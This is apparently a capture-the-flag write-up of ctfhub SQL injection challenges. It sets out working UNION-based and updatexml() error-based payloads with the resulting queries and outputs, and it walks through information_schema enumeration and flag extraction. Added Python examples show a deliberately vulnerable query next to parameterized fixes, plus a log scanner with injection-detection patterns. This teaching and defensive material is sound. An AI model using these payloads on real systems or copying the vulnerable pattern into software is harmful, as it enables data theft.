Today I wrote up a few SQL injection challenges from ctfhub; the solutions are fairly detailed.
I recently opened a cnblogs account and really like the template I'm using now. The cnblogs link for this post:
https://www.cnblogs.com/h3zh1/p/12556286.html
The knowledge points involved are all fairly common; the table below explains roughly which ones each challenge touches on.
Note: below, information_schema.xxxxxxxxxxxxxx always denotes a table under the information_schema database, such as schemata, tables and so on; unless stated otherwise, these all refer to tables in the information_schema database.
Also, these challenges are packaged by ctfhub, so all the database, table and column names are the same across them; don't be lazy.
Keyword / statement / function | Explanation |
---|---|
union select | Union query; commonly used in union-based injection |
database() | Echoes the database of the current connection |
version() | Shows the current SQL server version, e.g. mysql 1.2.3, mariadb-4.5.6 |
group_concat() | Joins the values of one group with commas into a single string |
information_schema | A database that stores a lot of MySQL metadata |
information_schema.schemata | A table in the information_schema database, named schemata |
schema_name | The column of the schemata table that stores the names of all MySQL databases |
information_schema.tables | Stores all MySQL tables |
table_schema | The column of the tables table that stores the database each table belongs to |
table_name | The table's name; pairs one-to-one with table_schema |
information_schema.columns | The columns table stores information about every column |
column_name | Once you know a table's name, this column gives you all of its column (field) names |
table_name | The table's name; pairs one-to-one with column_name |
select updatexml(1,concat(0x7e,database(),0x7e),1); | Note: only replace database() with whatever you want, and the error message echoes it |
right(str, num) | Takes num characters from the right end of the string |
left(str,num) | Likewise, takes num characters from the left end of the string |
substr(str,N,M) | Takes M characters from the string, starting at character N |
# 1. SQL integer-type injection
- Dump the current database
```sql
-- payload
4 union select 3,database()
-- resulting query
select * from news where id=4 union select 3,database()
```
Echo:
```
ID: 3
Data: sqli
```
- Dump all databases via information_schema.schemata
```sql
-- payload
4 union select 3,group_concat(schema_name) from information_schema.schemata
-- resulting query
select * from news where id=4 union select 3,group_concat(schema_name) from information_schema.schemata
```
Echo:
```
ID: 3
Data: information_schema,mysql,performance_schema,sqli
```
- Dump the table names via information_schema.tables and the known database name sqli
```sql
-- payload
4 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"
-- resulting query
select * from news where id=4 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"
```
Echo:
```
ID: 3
Data: news,flag
```
- Now that we know the flag table, dump its columns via information_schema.columns and the table name flag
```sql
-- payload
4 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"
-- resulting query
select * from news where id=4 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"
```
Echo:
```
ID: 3
Data: flag
```
- Once we know the flag column it's straightforward: query its contents directly
```sql
-- payload
4 union select 3,group_concat(flag) from sqli.flag
-- resulting query
select * from news where id=4 union select 3,group_concat(flag) from sqli.flag
```
Echo:
```
ID: 3
Data: ctfhub{cf0c7df79d5f387aca776784bb5cfaebf98980f0}
```
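As an added illustration (not code from the write-up or from ctfhub), here is the query pattern behind section 1 rebuilt in Python over an in-memory SQLite database: the same integer-position concatenation that lets the UNION payload above pull rows out of another table, next to a bound-parameter version that treats the input as a value. SQLite stands in for MySQL, so the payload reads a constructed `flag` table directly instead of going through information_schema, and the flag value is a constructed placeholder.

```python
import sqlite3

# Constructed stand-in for the challenge's news and flag tables (SQLite, not MySQL,
# so the example runs offline). The flag value is a placeholder, not the real one.
FLAG = "ctfhub{constructed-placeholder}"


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, data TEXT);
        INSERT INTO news VALUES (1, 'first post'), (4, 'fourth post');
        CREATE TABLE flag (flag TEXT);
    """)
    db.execute("INSERT INTO flag VALUES (?)", (FLAG,))
    return db


def lookup_vulnerable(db, user_id):
    # The challenge's pattern: the request parameter is pasted straight into the
    # statement, so the integer position happily accepts a trailing UNION.
    return db.execute("select * from news where id=" + user_id).fetchall()


def lookup_parameterized(db, user_id):
    # Bound parameter: the driver sends the input as a value, never as SQL text.
    return db.execute("select * from news where id=?", (user_id,)).fetchall()


def lookup_validated(db, user_id):
    # Input validation on top of binding: an integer id must actually parse as one,
    # so a payload is rejected before it reaches the database at all.
    try:
        n = int(user_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return db.execute("select * from news where id=?", (n,)).fetchall()


# The integer-type payload from the write-up (SQLite also has group_concat).
PAYLOAD = "4 union select 3,group_concat(flag) from flag"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:    ", lookup_vulnerable(db, PAYLOAD))     # leaks (3, FLAG)
    print("parameterized: ", lookup_parameterized(db, PAYLOAD))  # []
```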
# 2. SQL string-type injection
- Find the column count; no real need to, since the echo only has two columns: ID and DATA
```sql
-- payload
3' union select database(),version() #
```
- Dump the database names
```sql
-- payload
3' union select database(),group_concat(schema_name) from information_schema.schemata #
-- resulting query
select * from news where id='3' union select database(),group_concat(schema_name) from information_schema.schemata #'
```
Echo (the current database name is sqli):
```
ID: sqli
Data: information_schema,performance_schema,mysql,sqli
```
- Dump the table names
```sql
-- payload
3' union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli' #
-- resulting query
select * from news where id='3' union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli' #'
```
Echo (table name: flag):
```
ID: sqli
Data: news,flag
```
- Dump the column names
```sql
-- payload
3' union select database(),group_concat(column_name) from information_schema.columns where table_name='flag' #
-- resulting query
select * from news where id='3' union select database(),group_concat(column_name) from information_schema.columns where table_name='flag' #'
```
Echo (column name: flag):
```
ID: sqli
Data: flag
```
- Dump the flag
```sql
-- payload
3' union select database(),group_concat(flag) from sqli.flag #
-- resulting query
select * from news where id='3' union select database(),group_concat(flag) from sqli.flag #'
```
Echo:
```
ID: sqli
Data: ctfhub{4f0e4923b55e73aa9a1a5fd66fb88b13a1e9e7f2}
```
# 3. SQL error-based injection
- Dump the current database
```sql
-- payload
1 union select updatexml(1,concat(0x7e,database(),0x7e),1); #
```
- Dump all databases; note that the subquery on that line must be wrapped in parentheses
```sql
-- payload
1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata) ,0x7e),1); #
-- resulting query
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata) ,0x7e),1); #
```
Echo:
```
查詢錯誤: XPATH syntax error: '~information_schema,mysql,perfor'
```
Only part of the database list is echoed, and the name sqli is missing, so the echo length must be limited; the substr, left, mid and right functions mentioned earlier deal with that. Note the maximum length of the echoed string: 32 characters.
- Dump the rightmost 31 characters; the two pieces overlap
```sql
-- payload
1 union select updatexml(1,concat(0x7e,right( (select(group_concat(schema_name))from information_schema.schemata) ,31 ),0x7e),1); #
-- resulting query
select * from news where id=1 union select updatexml(1,concat(0x7e, right((select(group_concat(schema_name))from information_schema.schemata) ,31) ,0x7e),1); #
```
Echo:
```
查詢錯誤: XPATH syntax error: '~a,mysql,performance_schema,sqli'
```
So there are four databases in total: information_schema,mysql,performance_schema,sqli
- Dump the tables
```sql
-- payload
1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1); #
-- resulting query
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1); #
```
Echo:
```
查詢錯誤: XPATH syntax error: 'news,flag'
```
- Dump the column names
```sql
-- payload
1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #
-- resulting query
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #
```
Echo:
```
查詢錯誤: XPATH syntax error: 'flag'
```
- Dump the contents
First part of the flag:
```sql
-- payload
1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #
-- resulting query
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #
```
Echo:
```
查詢錯誤: XPATH syntax error: '~ctfhub{2333ee20c980f72952ce65c4'
```
The other part of the flag:
```sql
-- payload
1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #
-- resulting query
select * from news where id=1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #
```
Echo:
```
查詢錯誤: XPATH syntax error: '~80f72952ce65c494ec82b147e9940d}'
```
Concatenated flag: ctfhub{2333ee20c980f72952ce65c494ec82b147e9940d}
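From the other side of the wire, as an added example that is not part of the write-up: a small access-log scanner that flags the request shapes used in sections 1 to 3 (UNION enumeration, information_schema lookups, and updatexml()/0x7e error-based extraction, which typically surfaces as a 500 response). The log lines, client addresses and timestamps are constructed, and the signature names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Common Log Format lines (hosts, times and sizes made up); the query
# strings carry the payload shapes from the write-up, percent-encoded as sent.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=4 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=4%20union%20select%203,group_concat(schema_name)%20from%20information_schema.schemata HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=3%27%20union%20select%20database(),version()%20%23 HTTP/1.1" 200 600
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?id=1%20union%20select%20updatexml(1,concat(0x7e,database(),0x7e),1)%3B%20%23 HTTP/1.1" 500 300
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?id=7&page=2 HTTP/1.1" 200 480
"""

# Indicators for the three techniques covered above; the names are this example's own.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "error_based_xml": re.compile(r"\bupdatexml\s*\(", re.I),
    "comment_terminator": re.compile(r"#|--\s|/\*"),
}
# client, identity, user, [time], "method target protocol", status, ...
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def scan_line(line):
    """Return (ip, status, {param: [signature, ...]}), or None if the line does not parse."""
    m = REQ_RE.match(line)
    if not m:
        return None
    # Decode each query parameter on its own so percent-encoding cannot hide keywords.
    hits = {}
    for key, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        names = [name for name, rx in SIGNATURES.items() if rx.search(value)]
        if names:
            hits[key] = names
    return m.group("ip"), int(m.group("status")), hits


def scan_log(text):
    """Return (ip, status, hits) for every request that matched at least one signature."""
    return [r for r in map(scan_line, text.splitlines()) if r and r[2]]


if __name__ == "__main__":
    for ip, status, hits in scan_log(SAMPLE_LOG):
        print(ip, status, hits)
```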